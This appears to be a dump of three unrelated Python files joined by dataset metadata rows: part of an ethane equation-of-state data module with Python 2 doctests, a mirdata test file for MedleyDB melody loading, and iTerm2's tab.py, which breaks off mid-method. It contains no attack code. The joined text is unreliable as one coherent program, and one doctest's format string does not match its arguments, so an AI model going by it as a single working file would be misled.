"title": "The GERG-2008 Wide-Range Equation of State for Natural Gases and Other Mixtures: An Expansion of GERG-2004",
"ref": "J. Chem. Eng. Data, 2012, 57 (11), pp 3032–3091",
"doi": "10.1021/je300655b"},
"R": 8.314472,
"cp": Fi2,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
# "Pmin": 0.61166, "rhomin": 55.497,
"nr1": [0.63596780450714, -0.17377981785459e1, 0.28914060926272,
-0.33714276845694, 0.22405964699561e-1, 0.15715424886913e-1],
"d1": [1, 1, 2, 2, 4, 4],
"t1": [0.125, 1.125, 0.375, 1.125, 0.625, 1.5],
"nr2": [0.11450634253745, 0.10612049379745e1, -0.12855224439423e1,
0.39414630777652, 0.31390924682041, -0.21592277117247e-1,
-0.21723666564905, -0.28999574439489, 0.42321173025732,
0.46434100259260e-1, -0.13138398329741, 0.11492850364368e-1,
-0.33387688429909e-1, 0.15183171583644e-1, -0.47610805647657e-2,
0.46917166277885e-1, -0.39401755804649e-1, -0.32569956247611e-2],
"d2": [1, 1, 1, 2, 3, 6, 2, 3, 3, 4, 4, 2, 3, 4, 5, 6, 6, 7],
"t2": [0.625, 2.625, 2.75, 2.125, 2, 1.75, 4.5, 4.75, 5, 4, 4.5, 7.5,
14, 11.5, 26, 28, 30, 16],
"c2": [1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 6, 6, 6, 6],
"gamma2": [1]*18}
helmholtz3 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Friend et al. (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"__test__":
# Table A1, Pag 336
"""
>>> st=C2(T=500, P=1e5, eq=3)
>>> print "%0.6g %0.1f %0.3f %0.3f %0.3f %0.3f %0.2f" % (\
st.T, st.aM0.kJkmol, st.hM0.kJkmol, st.sM0.kJkmolK, st.cpM0.kJkmolK)
500 -110.311 25.059 262.43 77.987
"""
# Table A2, Pag 337
"""
>>> st=C2(T=92, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
92 1.7e-06 21.61 2.27e-06 67.74 1987.2 1193.00 254.4
>>> st=C2(T=100, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
100 1.1e-05 21.32 1.33e-05 70.09 1937.6 876.96 248.1
>>> st=C2(T=150, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
            150 9.7e-03 19.47 7.80e-03 70.27 1573.2 270.35 201.0
>>> st=C2(T=200, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
200 0.217 17.42 0.139 74.86 1194.4 138.17 152.5
>>> st=C2(T=250, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
250 1.301 14.89 0.787 87.29 794.6 78.06 109.1
>>> st=C2(T=300, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
300 4.356 10.10 3.813 182.06 278.4 35.01 71.3
>>> st=C2(T=302, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
302 4.543 9.59 4.262 223.66 246.4 32.44 72.0
>>> st=C2(T=304, rhom=8.82, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
304 4.738 8.82 4.969 354.78 209.4 28.97 79.0
"""
# Table A3, Pag 339
"""
>>> st=C2(T=130, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
130 1 20.24 -12.071 102.03 45.01 70.10 1726.9 392.40 221.3
>>> st=C2(T=140, P=6e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
140 60 20.80 -9.131 102.52 46.34 67.67 1921.7 476.29 245.7
>>> st=C2(T=160, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
160 2 19.13 -9.933 116.48 43.04 70.44 1511.1 235.10 192.5
>>> st=C2(T=180, P=1e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
180 0.1 18.28 -8.571 125.09 42.65 72.41 1347.8 176.42 171.5
>>> st=C2(T=200, P=1e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
200 10 17.79 -6.804 131.51 43.41 73.00 1281.7 151.38 161.5
>>> st=C2(T=240, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
240 1 15.47 -3.894 147.18 44.93 85.36 878.8 87.70 117.4
>>> st=C2(T=270, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
270 2 1.20 8.589 194.29 47.40 76.57 245.2 9.33 21.6
>>> st=C2(T=280, P=5e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
280 5 13.26 -0.228 160.21 48.73 103.93 603.7 57.96 90.7
>>> st=C2(T=300, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
300 1 0.43 11.364 209.01 45.59 57.20 296.8 9.65 22.2
>>> st=C2(T=330, P=5e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
330 0.5 0.19 13.366 220.86 48.51 57.89 320.8 10.37 25.6
>>> st=C2(T=360, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
            360 2 0.73 14.500 213.23 53.11 65.46 319.6 11.65 31.1
>>> st=C2(T=400, P=5e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
400 5 1.77 16.051 210.58 59.05 76.57 322.4 13.91 40.0
>>> st=C2(T=430, P=2e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
430 20 7.42 14.158 197.14 64.79 101.22 409.8 27.52 66.5
>>> st=C2(T=480, P=1e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
480 0.1 0.03 23.500 259.25 67.28 75.67 385.8 14.28 50.1
>>> st=C2(T=500, P=6e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
500 60 11.21 19.385 199.38 73.24 95.28 752.5 48.34 101.4
""",
"R": 8.31451,
"cp": Fi3,
"ref": {"Tref": 298.15, "Pref": 101.325, "ho": 11874, "so": 229.12},
"Tt": 90.352, "Tc": 305.33, "Pc": 4871.8, "rhoc": 6.87, "M": 30.07,
"Tmin": 90.352, "Tmax": 625.0, "Pmax": 70000.0, "rhomax": 22.419,
"Pmin": 1.130e-3, "rhomin": 21.665,
"nr1": [0.46215430560, -0.19236936387e1, 0.39878604003, 0.16054532372e-1,
0.12895242219, 0.35458320491e-1, 0.34927844540e-1,
-0.11306183380e-1, -0.39809032779e-1, 0.83031936834e-3,
0.45921575183e-3, 0.17530287917e-6, -0.70919516126e-4],
"d1": [1, 1, 1, 2, 2, 2, 3, 3, 3, 6, 7, 7, 8],
"t1": [0, 1.5, 2.5, -0.5, 1.5, 2, 0, 1, 2.5, 0, 2, 5, 2],
"nr2": [-0.23436162249, 0.84574697645e-1, 0.14861052010, -0.10016857867,
-0.59264824388e-1, -0.41263514217e-1, 0.21855161869e-1,
-0.74552720958e-4, -0.98859085572e-2, 0.10208416499e-2,
-0.52189655847e-3, 0.98592162030e-4, 0.46865140856e-1,
-0.19558011646e-1, -0.46557161651e-1, 0.32877905376e-2,
0.13572090185, -0.10846471455, -0.67502836903e-2],
"d2": [1, 1, 2, 2, 3, 3, 5, 6, 7, 8, 10, 2, 3, 3, 4, 4, 5, 5, 5],
"t2": [5, 6, 3.5, 5.5, 3, 7, 6, 8.5, 4, 6.5, 5.5, 22, 11, 18, 11, 23,
17, 18, 23],
"c2": [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 4, 4, 4, 4, 4, 4],
"gamma2": [1]*19}
helmholtz4 = {
"__type__": "Helmholtz",
"__name__": "short Helmholtz equation of state for ethane of Span and Wagner (2003)",
"__doi__": {"autor": "Span, R., Wagner, W.",
"title": "Equations of state for technical applications. II. Results for nonpolar fluids.",
"ref": "Int. J. Thermophys. 24 (2003), 41 – 109.",
"doi": "10.1023/A:1022310214958"},
"__test__": """
>>> st=C2(T=700, rho=200, eq=4)
>>> print "%0.4f %0.3f %0.4f" % (st.cp0.kJkgK, st.P.MPa, st.cp.kJkgK)
3.2991 44.781 3.6276
>>> st2=C2(T=750, rho=100, eq=4)
>>> print "%0.2f %0.5f" % (st2.h.kJkg-st.h.kJkg, st2.s.kJkgK-st.s.kJkgK)
209.07 0.50715
""", # Table III, Pag 46
"R": 8.31451,
"cp": Fi1,
"ref": "OTO",
"Tmin": 90.352, "Tmax": 750.0, "Pmax": 100000.0, "rhomax": 22.419,
"Pmin": 0.0010902, "rhomin": 21.721,
"nr1": [0.97628068, -0.26905251e1, 0.73498222, -0.35366206e-1,
0.84692031e-1, 0.24154594e-3],
"d1": [1, 1, 1, 2, 3, 7],
"t1": [0.25, 1.125, 1.5, 1.375, 0.25, 0.875],
"nr2": [0.23964954, -0.42780093e-1, -0.22308832, -0.51799954e-1,
-0.27178426e-1, 0.11246305e-1],
"d2": [2, 5, 1, 4, 3, 4],
"t2": [0.625, 1.75, 3.625, 3.625, 14.5, 12.],
"c2": [1, 1, 2, 2, 3, 3],
"gamma2": [1]*6}
helmholtz5 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Sun and Ely (2004)",
"__doi__": {"autor": "Sun, L. and Ely, J.F.",
"title": "Universal equation of state for engineering application: Algorithm and application to non-polar and polar fluids",
"ref": "Fluid Phase Equilib., 222-223:107-118, 2004.",
"doi": "10.1016/j.fluid.2004.06.028"},
"R": 8.314472,
"cp": Fi1,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
"Pmin": 0.00114, "rhomin": 21.668,
"nr1": [1.32031629, 9.47177394e-1, -3.21919278, 7.47287278e-2,
2.74919584e-4, -6.33952115e-2],
"d1": [1, 1, 1, 3, 7, 2],
"t1": [1.5, 0.25, 1.25, 0.25, 0.875, 1.375],
"nr2": [-5.17685674e-2, 3.65838926e-2, 2.57753669e-1, -1.34856586e-2,
-2.21551776e-1, -6.89219870e-4, -4.47904791e-2, -2.15665728e-2],
"d2": [1, 1, 2, 5, 1, 1, 4, 2],
"t2": [0, 2.375, 2., 2.125, 3.5, 6.5, 4.75, 12.5],
"c2": [1, 1, 1, 1, 2, 2, 2, 3],
"gamma2": [1]*8}
eq = helmholtz1, MBWR, GERG, helmholtz3, helmholtz4, helmholtz5
_surface = {"sigma": [0.07602, -0.02912], "exp": [1.32, 1.676]}
_dielectric = {"eq": 3, "Tref": 273.16, "rhoref": 1000.,
"a0": [], "expt0": [], "expd0": [],
"a1": [11.1552, 0.0112], "expt1": [0, 1], "expd1": [1, 1],
"a2": [36.759, 23.639, -808.03, -378.84],
"expt2": [0, 1, 0, 1], "expd2": [2, 2, 2.75, 2.75]}
_melting = {"eq": 1, "Tref": Tt, "Pref": 0.0011421,
"Tmin": Tt, "Tmax": 2000.0,
"a1": [1, 1.05262374e8, -1.05262374e8], "exp1": [0, 2.55, 0],
"a2": [2.23626315e8], "exp2": [1], "a3": [], "exp3": []}
_vapor_Pressure = {
"eq": 5,
"ao": [-6.48647577, 1.47010078, -1.66261122, 3.57898378, -4.79105705],
"exp": [1, 1.5, 2.5, 3.5, 4]}
_liquid_Density = {
"eq": 4,
"ao": [1.56138026, -0.381552776, 0.078537204, 0.0370315089],
"exp": [0.987, 2, 4, 9.5]}
_vapor_Density = {
"eq": 6,
"ao": [-1.89879145, -3.65459262, 0.850562745, 0.363965487, -1.50005943,
-2.26690389],
"exp": [1.038, 2.5, 3, 6, 9, 15]}
visco0 = {"eq": 1, "omega": 1,
"collision": [0.17067154, -0.48879666, 0.039038856],
"__name__": "Friend (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"ek": 245.0, "sigma": 0.43682,
"Tref": 1, "rhoref": 1.*M,
"n_chapman": 0.1463897/M**0.5,
"Tref_res": 305.33, "rhoref_res": 6.87*M, "etaref_res": 15.977,
"n_num": [0.47177003, -0.23950311, 0.39808301, -0.27343335,
0.35192260, -0.21101308, -0.00478579, 0.07378129,
-0.030425255],
"t_num": [0, -1, 0, -1, -1.5, 0, -2, 0, -1],
"d_num": [1, 1, 2, 2, 2, 3, 3, 4, 4],
"g_num": [0, 0, 0, 0, 0, 0, 0, 0, 0],
"c_num": [0, 0, 0, 0, 0, 0, 0, 0, 0],
"n_den": [1., -0.30435286, 0.001215675],
"t_den": [0, 0, -1],
"d_den": [0, 1, 1],
"g_den": [0, 0, 0],
"c_den": [0, 0, 0]}
visco1 = {"eq": 2, "omega": 2,
"__name__": "Younglove (1987)",
"__doi__": {"autor": "Younglove, B.A. and Ely, J.F.",
"title": "Thermophysical Properties of Fluids. II. Methane, Ethane, Propane, Isobutane, and Normal Butane ",
"ref": "J. Phys. Chem. Ref. Data 16, 577 (1987)",
"doi": "10.1063/1.555785"},
"ek": 240.0, "sigma": 0.440110,
"n_chapman": 0.146388493/M**0.5,
"F": [0.2102436247e1, -0.1065920192e1, 1.4, 305.33],
"E": [-0.1903481042e2, 0.1799260494e4, 0.1561316986e2,
-0.1497221136e5, 0.1130374601, -0.2186440756e2,
0.8235954037e4],
"rhoc": 6.875}
visco2 = {"eq": 4, "omega": 1,
"__name__": u"Quiñones-Cisneros (2006)",
"__doi__": {"autor": "S.E.Quiñones-Cisneros and U.K. Deiters",
"title": "Generalization of the Friction Theory for Viscosity Modeling",
"ref": "J. Phys. Chem. B, 2006, 110 (25), pp 12820–12834",
"doi": "10.1021/jp0618577"},
"Tref": 305.322, "muref": 1.0,
"ek": 240.0, "sigma": 0.440110, "n_chapman": 0,
"n_ideal": [15.9252, -49.7734, 43.4368],
"t_ideal": [0, 0.25, 0.5],
"a": [-7.50685764546476e-6, -1.50327318940575e-6, 5.58090793793288e-15],
"b": [6.72861662009487e-5, -4.36450942982638e-5, -7.97441663817752e-14],
"c": [3.88039503242230e-5, -1.38523739665972e-5, -2.64094611051755e-15],
"A": [7.68043111364307e-10, -1.32047872761278e-10, 0.0],
"B": [9.15406537766279e-9, 4.13028199950288e-10, 0.0],
"C": [-1.45842039761136e-7, 2.39764228120527e-7, 0.0],
"D": [0.0, 0.0, 0.0]}
_viscosity = visco0, visco1, visco2
thermo0 = {"eq": 1,
"__name__": "Friend (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"Tref": 245.0, "kref": 1e-3,
"no": [1.7104147, -0.6936482, 0],
"co": [0, -1, -96],
"Trefb": 305.33, "rhorefb": 6.87, "krefb": 4.41786e-3,
"nb": [0.96084322, 2.7500235, -0.026609289, -0.078146729,
0.21881339, 2.3849563, -0.75113971],
"tb": [0, 0, 0, 0, 0, -1.5, -1],
"db": [1, 2, 3, 4, 5, 1, 3],
"cb": [0]*7,
"critical": 3,
"gnu": 0.63, "gamma": 1.242, "R0": 1.01,
"Xio": 0.19e-9, "gam0": 0.0563, "qd": -0.545e-9, "Tcref": 610.66}
_thermal = thermo0,
| gpl-3.0 | -2,264,954,759,358,182,100 | 55.345395 | 181 | 0.480326 | false |
mir-dataset-loaders/mirdata | tests/datasets/test_medleydb_melody.py | 1 | 4656 | import numpy as np
from mirdata.datasets import medleydb_melody
from mirdata import annotations
from tests.test_utils import run_track_tests
def test_track():
default_trackid = "MusicDelta_Beethoven"
data_home = "tests/resources/mir_datasets/medleydb_melody"
dataset = medleydb_melody.Dataset(data_home)
track = dataset.track(default_trackid)
expected_attributes = {
"track_id": "MusicDelta_Beethoven",
"audio_path": "tests/resources/mir_datasets/"
+ "medleydb_melody/audio/MusicDelta_Beethoven_MIX.wav",
"melody1_path": "tests/resources/mir_datasets/"
+ "medleydb_melody/melody1/MusicDelta_Beethoven_MELODY1.csv",
"melody2_path": "tests/resources/mir_datasets/"
+ "medleydb_melody/melody2/MusicDelta_Beethoven_MELODY2.csv",
"melody3_path": "tests/resources/mir_datasets/"
+ "medleydb_melody/melody3/MusicDelta_Beethoven_MELODY3.csv",
"artist": "MusicDelta",
"title": "Beethoven",
"genre": "Classical",
"is_excerpt": True,
"is_instrumental": True,
"n_sources": 18,
}
expected_property_types = {
"melody1": annotations.F0Data,
"melody2": annotations.F0Data,
"melody3": annotations.MultiF0Data,
"audio": tuple,
}
run_track_tests(track, expected_attributes, expected_property_types)
y, sr = track.audio
assert sr == 44100
assert y.shape == (44100 * 2,)
def test_to_jams():
data_home = "tests/resources/mir_datasets/medleydb_melody"
dataset = medleydb_melody.Dataset(data_home)
track = dataset.track("MusicDelta_Beethoven")
jam = track.to_jams()
f0s = jam.search(namespace="pitch_contour")[1]["data"]
assert [f0.time for f0 in f0s] == [0.046439909297052155, 0.052244897959183675]
assert [f0.duration for f0 in f0s] == [0.0, 0.0]
assert [f0.value for f0 in f0s] == [
{"frequency": 0.0, "index": 0, "voiced": False},
{"frequency": 965.992, "index": 0, "voiced": True},
]
assert [f0.confidence for f0 in f0s] == [None, None]
assert jam["file_metadata"]["title"] == "Beethoven"
assert jam["file_metadata"]["artist"] == "MusicDelta"
def test_load_melody():
# load a file which exists
melody_path = (
"tests/resources/mir_datasets/medleydb_melody/"
+ "melody1/MusicDelta_Beethoven_MELODY1.csv"
)
melody_data = medleydb_melody.load_melody(melody_path)
# check types
assert isinstance(melody_data, annotations.F0Data)
assert isinstance(melody_data.times, np.ndarray)
assert isinstance(melody_data.frequencies, np.ndarray)
assert isinstance(melody_data.voicing, np.ndarray)
# check values
assert np.array_equal(
melody_data.times, np.array([0.0058049886621315194, 0.052244897959183675])
)
assert np.array_equal(melody_data.frequencies, np.array([0.0, 965.99199999999996]))
assert np.array_equal(melody_data.voicing, np.array([0.0, 1.0]))
def test_load_melody3():
# load a file which exists
melody_path = (
"tests/resources/mir_datasets/medleydb_melody/"
+ "melody3/MusicDelta_Beethoven_MELODY3.csv"
)
melody_data = medleydb_melody.load_melody3(melody_path)
# check types
assert type(melody_data) == annotations.MultiF0Data
assert type(melody_data.times) is np.ndarray
assert type(melody_data.frequency_list) is list
assert type(melody_data.confidence_list) is list
# check values
assert np.allclose(
melody_data.times,
np.array([0.046439909297052155, 0.052244897959183675, 0.05804989]),
)
assert melody_data.frequency_list == [
[497.01600000000002],
[965.99199999999996, 996.46799999999996, 497.10599999999999],
[990.107, 997.608, 497.138],
]
assert melody_data.confidence_list == [
[1.0],
[1.0, 1.0, 1.0],
[1.0, 1.0, 1.0],
]
def test_load_metadata():
data_home = "tests/resources/mir_datasets/medleydb_melody"
dataset = medleydb_melody.Dataset(data_home)
metadata = dataset._metadata
assert metadata["MusicDelta_Beethoven"] == {
"audio_path": "medleydb_melody/audio/MusicDelta_Beethoven_MIX.wav",
"melody1_path": "medleydb_melody/melody1/MusicDelta_Beethoven_MELODY1.csv",
"melody2_path": "medleydb_melody/melody2/MusicDelta_Beethoven_MELODY2.csv",
"melody3_path": "medleydb_melody/melody3/MusicDelta_Beethoven_MELODY3.csv",
"artist": "MusicDelta",
"title": "Beethoven",
"genre": "Classical",
"is_excerpt": True,
"is_instrumental": True,
"n_sources": 18,
}
| bsd-3-clause | -6,562,594,936,135,093,000 | 33.488889 | 87 | 0.651418 | false |
lgouger/iTerm2 | api/library/python/iterm2/iterm2/tab.py | 1 | 10947 | """Provides a class that represents an iTerm2 tab."""
import enum
import iterm2.api_pb2
import iterm2.app
import iterm2.capabilities
import iterm2.rpc
import iterm2.session
import iterm2
import json
import typing
class NavigationDirection(enum.Enum):
"""Cardinal directions."""
LEFT = "left"
RIGHT = "right"
ABOVE = "above"
BELOW = "below"
class Tab:
"""Represents a tab.
Don't create this yourself. Instead, use :class:`~iterm2.App`."""
def __init__(self, connection, tab_id, root, tmux_window_id=None, tmux_connection_id=None):
self.connection = connection
self.__tab_id = tab_id
self.__root = root
self.active_session_id = None
self.__tmux_window_id = tmux_window_id
self.__tmux_connection_id = tmux_connection_id
def __repr__(self):
return "<Tab id=%s sessions=%s>" % (self.__tab_id, self.sessions)
def update_from(self, other):
"""Copies state from another tab into this one."""
self.__root = other.root
self.active_session_id = other.active_session_id
def update_session(self, session):
"""Replaces references to a session."""
self.__root.update_session(session)
@property
def window(self) -> 'iterm2.Window':
"""Returns the containing window."""
# Note: App sets get_window on Tab when it's created.
return Tab.get_window(self)
@property
def tmux_connection_id(self):
        """The tmux connection id, or None if this is not a tmux integration tab."""
        return self.__tmux_connection_id
@property
def tab_id(self) -> str:
"""
Each tab has a globally unique identifier.
:returns: The tab's identifier, a string.
"""
return self.__tab_id
@property
def sessions(self) -> typing.List[iterm2.session.Session]:
"""
A tab contains a list of sessions, which are its split panes.
:returns: The sessions belonging to this tab, in no particular order.
"""
return self.__root.sessions
@property
def root(self) -> iterm2.session.Splitter:
"""
A tab's sessions are stored in a tree. This returns the root of that tree.
An interior node of the tree is a Splitter. That corresponds to a
collection of adjacent sessions with split pane dividers that are all
either vertical or horizontal.
Leaf nodes are Sessions.
:returns: The root of the session tree.
"""
return self.__root
@property
def current_session(self) -> typing.Union[None, iterm2.session.Session]:
"""
:returns: The active session in this tab or `None` if it could not be determined.
"""
for session in self.sessions:
if session.session_id == self.active_session_id:
return session
return None
def pretty_str(self, indent: str="") -> str:
"""
:returns: A human readable description of the tab and its sessions.
"""
session = indent + "Tab id=%s\n" % self.tab_id
session += self.__root.pretty_str(indent=indent + " ")
return session
async def async_select(self, order_window_front: bool=True) -> None:
"""Deprecated in favor of `async_activate`."""
        await self.async_activate(order_window_front)
async def async_activate(self, order_window_front: bool=True) -> None:
"""
Selects this tab.
        :param order_window_front: Whether the window this tab is in should be brought to the front and given keyboard focus.
.. seealso:: Example ":ref:`function_key_tabs_example`"
"""
await iterm2.rpc.async_activate(
self.connection,
False,
True,
order_window_front,
tab_id=self.__tab_id)
async def async_select_pane_in_direction(self, direction: NavigationDirection) -> typing.Optional[str]:
"""
Activates a split pane adjacent to the currently selected pane.
Requires iTerm2 version 3.3.2.
        :param direction: Specifies the direction to move. For example, LEFT selects the pane to the left of the currently active one.
        :returns: The ID of the newly selected session, or None if there was no session in that direction.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
if not iterm2.capabilities.supports_select_pane_in_direction(self.connection):
raise iterm2.capabilities.AppVersionTooOld()
invocation = iterm2.util.invocation_string(
"iterm2.select_pane_in_direction",
{ "direction": direction.value })
await iterm2.rpc.async_invoke_method(self.connection, self.tab_id, invocation, -1)
async def async_update_layout(self) -> None:
"""Adjusts the layout of the sessions in this tab.
Change the `Session.preferred_size` of any sessions you wish to adjust before calling this.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
response = await iterm2.rpc.async_set_tab_layout(self.connection, self.tab_id, self.__root.to_protobuf())
status = response.set_tab_layout_response.status
if status == iterm2.api_pb2.SetTabLayoutResponse.Status.Value("OK"):
return response.set_tab_layout_response
else:
raise iterm2.rpc.RPCException(iterm2.api_pb2.SetTabLayoutResponse.Status.Name(status))
@property
def tmux_window_id(self) -> typing.Union[None, str]:
"""Returns this tab's tmux window id or None.
:returns: A tmux window id or `None` if this is not a tmux integration window.
"""
return self.__tmux_window_id
async def async_set_variable(self, name: str, value: typing.Any) -> None:
"""
Sets a user-defined variable in the tab.
See the Scripting Fundamentals documentation for more information on user-defined variables.
:param name: The variable's name. Must begin with `user.`.
:param value: The new value to assign.
:throws: :class:`RPCException` if something goes wrong.
"""
result = await iterm2.rpc.async_variable(
self.connection,
sets=[(name, json.dumps(value))],
tab_id=self.__tab_id)
status = result.variable_response.status
if status != iterm2.api_pb2.VariableResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.VariableResponse.Status.Name(status))
async def async_get_variable(self, name: str) -> typing.Any:
"""
Fetches a tab variable.
See Badges documentation for more information on variables.
:param name: The variable's name.
:returns: The variable's value or `None` if it is undefined.
:throws: :class:`RPCException` if something goes wrong.
.. seealso:: Example ":ref:`sorttabs_example`"
"""
